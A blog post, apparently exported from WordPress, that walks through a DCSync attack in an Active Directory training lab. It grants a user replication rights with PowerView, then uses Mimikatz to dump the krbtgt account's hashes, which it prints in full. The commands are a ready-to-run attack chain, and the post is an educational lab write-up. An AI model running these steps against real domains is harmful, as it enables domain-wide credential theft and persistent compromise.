{"id":751,"date":"2021-01-24T00:59:41","date_gmt":"2021-01-24T00:59:41","guid":{"rendered":"http:\/\/144.76.171.171\/blog\/?p=751"},"modified":"2021-01-25T21:46:09","modified_gmt":"2021-01-25T21:46:09","slug":"dcsync-attack","status":"publish","type":"post","link":"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/01\/24\/dcsync-attack\/","title":{"rendered":"DCSync Attack"},"content":{"rendered":"<p>HELLO after a long break! I am continuing with the Pentester Academy AD Lab. I have actually finished the lab, but my access ends on January 28, so I am trying to review as much as I can. In this post we will see how the Replication permission can be abused. Let's get started!<\/p>\n<h1>Lab Setup<\/h1>\n<p>Since we will be working through a scenario, we first need to create the relevant weakness. To do that, we run the following on the DC.<\/p>\n<pre><code class=\"language-ps1\">PS C:\\Windows\\system32&gt; Invoke-Command -FilePath C:\\AD\\PowerView.ps1 -Session $sess2\nPS C:\\Windows\\system32&gt; Enter-PSSession -Session $sess2<\/code><\/pre>\n<p>We will use the <code>Add-ObjectAcl<\/code> function on the DC, so we first have to send it to the DC with <code>Invoke-Command<\/code>. 
Now let's run the command that creates our lab environment.<\/p>\n<pre><code class=\"language-ps1\">[dcorp-dc]: PS C:\\Users\\svcadmin\\Documents&gt; Add-ObjectAcl -TargetDistinguishedName \"dc=dollarcorp,dc=moneycorp,dc=local\" -PrincipalSamAccountName student130 -Rights DCSync -Verbose\nVERBOSE: Get-DomainSearcher search string: LDAP:\/\/DC=dollarcorp,DC=moneycorp,DC=local\nVERBOSE: Get-DomainSearcher search string: LDAP:\/\/DC=dollarcorp,DC=moneycorp,DC=local\nVERBOSE: Granting principal S-1-5-21-1874506631-3219952063-538504511-45149 'DCSync' on DC=dollarcorp,DC=moneycorp,DC=local\nVERBOSE: Granting principal S-1-5-21-1874506631-3219952063-538504511-45149 '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' rights on DC=dollarcorp,DC=moneycorp,DC=local\nVERBOSE: Granting principal S-1-5-21-1874506631-3219952063-538504511-45149 '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' rights on DC=dollarcorp,DC=moneycorp,DC=local\nVERBOSE: Granting principal S-1-5-21-1874506631-3219952063-538504511-45149 '89e95b76-444d-4c62-991a-0facbeda640c' rights on DC=dollarcorp,DC=moneycorp,DC=local<\/code><\/pre>\n<p>We have granted the DCSync rights to the student130 user, 
and now we can exploit them.<\/p>\n<h1>Attack<\/h1>\n<p>First, let's check the rights of the user we control.<\/p>\n<pre><code class=\"language-ps1\">PS C:\\Users\\student130&gt; $acls = Invoke-ACLScanner -ResolveGUIDs | select *\nPS C:\\Users\\student130&gt; $acls | Where-Object {$_.IdentityReferenceName -match \"student130\" -and $_.ObjectDN -eq \"DC=dollarcorp,DC=moneycorp,DC=local\" } | select ObjectDN, ActiveDirectoryRights, ObjectAceType, IdentityReferenceName\n\nObjectDN                            ActiveDirectoryRights ObjectAceType                              IdentityReferenceName\n--------                            --------------------- -------------                              ---------------------\nDC=dollarcorp,DC=moneycorp,DC=local         ExtendedRight DS-Replication-Get-Changes-In-Filtered-Set student130\nDC=dollarcorp,DC=moneycorp,DC=local         ExtendedRight DS-Replication-Get-Changes                 student130\nDC=dollarcorp,DC=moneycorp,DC=local         ExtendedRight DS-Replication-Get-Changes-All             student130\n<\/code><\/pre>\n<p>Because the replication rights are visible in the properties of the domain object itself (in Active Directory Users and Computers on the DC, at the domain node), the $_.ObjectDN field in the query is set to \"DC=dollarcorp,DC=moneycorp,DC=local\".<\/p>\n<p>Now, just so you can see the difference, 
I will remove the rights granted during the lab setup and run the command above again.<\/p>\n<pre><code class=\"language-ps1\">PS C:\\Users\\student130&gt; $acls = Invoke-ACLScanner -ResolveGUIDs | select *\nPS C:\\Users\\student130&gt;\nPS C:\\Users\\student130&gt; $acls | Where-Object {$_.IdentityReferenceName -match \"student130\" -and $_.ObjectDN -eq \"DC=dollarcorp,DC=moneycorp,DC=local\" } | select ObjectDN, ActiveDirectoryRights, ObjectAceType, IdentityReferenceName\nPS C:\\Users\\student130&gt;\n<\/code><\/pre>\n<p>As you can see, no results come back. I'll set that aside now; I only wanted to show it. Let's go back to our lab. We saw that we have the replication rights. An attacker who sees this will immediately want to obtain the NTLM hash of the krbtgt account!<\/p>\n<pre><code class=\"language-ps1\">PS C:\\Users\\student130&gt; Invoke-Mimikatz -Command '\"lsadump::dcsync \/user:dcorp\\krbtgt\"'\n\n  .#####.   mimikatz 2.1.1 (x64) built on Nov 29 2018 12:37:56\n .## ^ ##.  
\"A La Vie, A L'Amour\" - (oe.eo) ** Kitten Edition **\n ## \/ \\ ##  \/*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )\n ## \\ \/ ##       &gt; http:\/\/blog.gentilkiwi.com\/mimikatz\n '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )\n  '#####'        &gt; http:\/\/pingcastle.com \/ http:\/\/mysmartlogon.com   ***\/\n\nmimikatz(powershell) # lsadump::dcsync \/user:dcorp\\krbtgt\n[DC] 'dollarcorp.moneycorp.local' will be the domain\n[DC] 'dcorp-dc.dollarcorp.moneycorp.local' will be the DC server\n[DC] 'dcorp\\krbtgt' will be the user account\n\nObject RDN           : krbtgt\n\n** SAM ACCOUNT **\n\nSAM Username         : krbtgt\nAccount Type         : 30000000 ( USER_OBJECT )\nUser Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )\nAccount expiration   :\nPassword last change : 2\/16\/2019 11:01:46 PM\nObject Security ID   : S-1-5-21-1874506631-3219952063-538504511-502\nObject Relative ID   : 502\n\nCredentials:\n  Hash NTLM: ff46a9d8bd66c6efd77603da26796f35\n    ntlm- 0: ff46a9d8bd66c6efd77603da26796f35\n    lm  - 0: b14d886cf45e2efb5170d4d9c4085aa2\n\nSupplemental Credentials:\n* Primary:NTLM-Strong-NTOWF *\n    Random Value : 6cb7f438bf5c099fe4d029ebb5c6e08e\n\n* Primary:Kerberos-Newer-Keys *\n    Default Salt : DOLLARCORP.MONEYCORP.LOCALkrbtgt\n    Default Iterations : 4096\n    Credentials\n      aes256_hmac       (4096) : e28b3a5c60e087c8489a410a1199235efaf3b9f125972c7a1e7618a7469bfd6a\n      aes128_hmac       (4096) : 4cffc651ba557c963b71b49d1add2e6b\n      des_cbc_md5       (4096) : bf5d7319947f54c7\n\n* Primary:Kerberos *\n    Default Salt : DOLLARCORP.MONEYCORP.LOCALkrbtgt\n    Credentials\n      des_cbc_md5       : bf5d7319947f54c7\n\n* Packages *\n    NTLM-Strong-NTOWF\n\n* Primary:WDigest *\n    01  7b766fa41d1e30157b6c0113528e63ea\n    02  1bda631fac0fdec6cedfecbc7a99e30d\n    03  d7be969eaa4b841a9914e2a5eff571f7\n    04  7b766fa41d1e30157b6c0113528e63ea\n    05  1bda631fac0fdec6cedfecbc7a99e30d\n    06  
8835f5f828c434a2fe077eb224e25943\n    07  7b766fa41d1e30157b6c0113528e63ea\n    08  8fdecaac2296648db5620a13723f60b5\n    09  8fdecaac2296648db5620a13723f60b5\n    10  aace962cfe8ebce04c9ed249e98369d3\n    11  6424d51e82fdc5e6a2f0559032cbead2\n    12  8fdecaac2296648db5620a13723f60b5\n    13  76e039370f352eaaff05fd2f6f8239d6\n    14  6424d51e82fdc5e6a2f0559032cbead2\n    15  acc424fd2c2c10d7e46950ad93e065c6\n    16  acc424fd2c2c10d7e46950ad93e065c6\n    17  734df139b9ceac875a011e24df53d335\n    18  e399f39adefad64659a67171b4399221\n    19  80cfc6a03006436b02bf3d27e8374444\n    20  04a4819688c0185368738acd7a8e12c4\n    21  4c60210b91d6e0fddc8a54f16337b218\n    22  4c60210b91d6e0fddc8a54f16337b218\n    23  ca7e51aef08dffca06881110ea03bf1d\n    24  36b3cac402a4005af573f1105ed14b3a\n    25  36b3cac402a4005af573f1105ed14b3a\n    26  b35c755b303bec7b4b7091a2f96d789f\n    27  58300e76fcc0c2c854c8cda6363470e2\n    28  2f6cbfe287e89f7f4829f443854857fd\n    29  610788375bd98bebd50561d66fcf8f74\n<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>HELLO after a long break! I am continuing with the Pentester Academy AD Lab. 
I have actually finished the lab, but my access ends on January 28, so I am trying to review as much as I&#8230;<\/p>\n<div class=\"more-link-wrapper\"><a class=\"more-link\" href=\"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/01\/24\/dcsync-attack\/\">Read more<span class=\"screen-reader-text\">DCSync Attack<\/span><\/a><\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[269,320],"tags":[438,455],"class_list":["post-751","post","type-post","status-publish","format-standard","hentry","category-active-directory","category-powershell","tag-dcsync","tag-powershell","entry"],"_links":{"self":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/751","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/comments?post=751"}],"version-history":[{"count":2,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/751\/revisions"}],"predecessor-version":[{"id":880,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/751\/revisions\/880"}],"wp:attachment":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/media?parent=751"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/categories?post=751"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/tags?post=751"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}